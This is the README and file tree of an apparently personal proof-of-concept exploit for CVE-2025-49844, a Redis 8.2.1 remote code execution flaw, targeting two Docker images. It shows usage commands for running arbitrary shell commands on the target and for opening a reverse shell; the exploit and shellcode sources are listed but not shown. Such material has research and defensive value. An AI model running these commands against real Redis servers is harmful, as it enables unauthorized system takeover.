Proof-of-concept for CVE-2025-49844# CVE-2025-49844
My personal proof-of-concept for [CVE-2025-49844], also known as [RediShell].
Supported target builds:
- x86-64 Linux `redis:8.2.1-alpine` Docker image
- x86-64 Linux `redis:8.2.1-bookworm` Docker image
It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had a great time investigating it.
## Usage
Run one-way shell commands:
```sh
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
```
Connect to a reverse shell:
```sh
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
```
[CVE-2025-49844]:https://nvd.nist.gov/vuln/detail/CVE-2025-49844
[RediShell]:https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844
[4.0K] /data/pocs/e52624e635182442b184d093fc55a77971387adf
├── [1.6K] demonstration.py
├── [4.0K] dockerfiles
│ ├── [4.0K] redis-8.2.1-alpine
│ │ ├── [ 105] compose.yaml
│ │ └── [ 65] Dockerfile
│ └── [4.0K] redis-8.2.1-bookworm
│ ├── [ 105] compose.yaml
│ └── [ 67] Dockerfile
├── [1.0K] LICENSE
├── [ 406] pyproject.toml
├── [ 762] README.md
├── [4.0K] src
│ └── [4.0K] cve_2025_49844
│ ├── [ 0] __init__.py
│ ├── [ 28K] main.py
│ ├── [7.8K] redis_8_2_1_alpine.py
│ ├── [7.0K] redis_8_2_1_bookworm.py
│ ├── [1.8K] shared.py
│ ├── [ 11K] shellcode.py
│ └── [ 418] util.py
└── [ 11K] uv.lock
6 directories, 16 files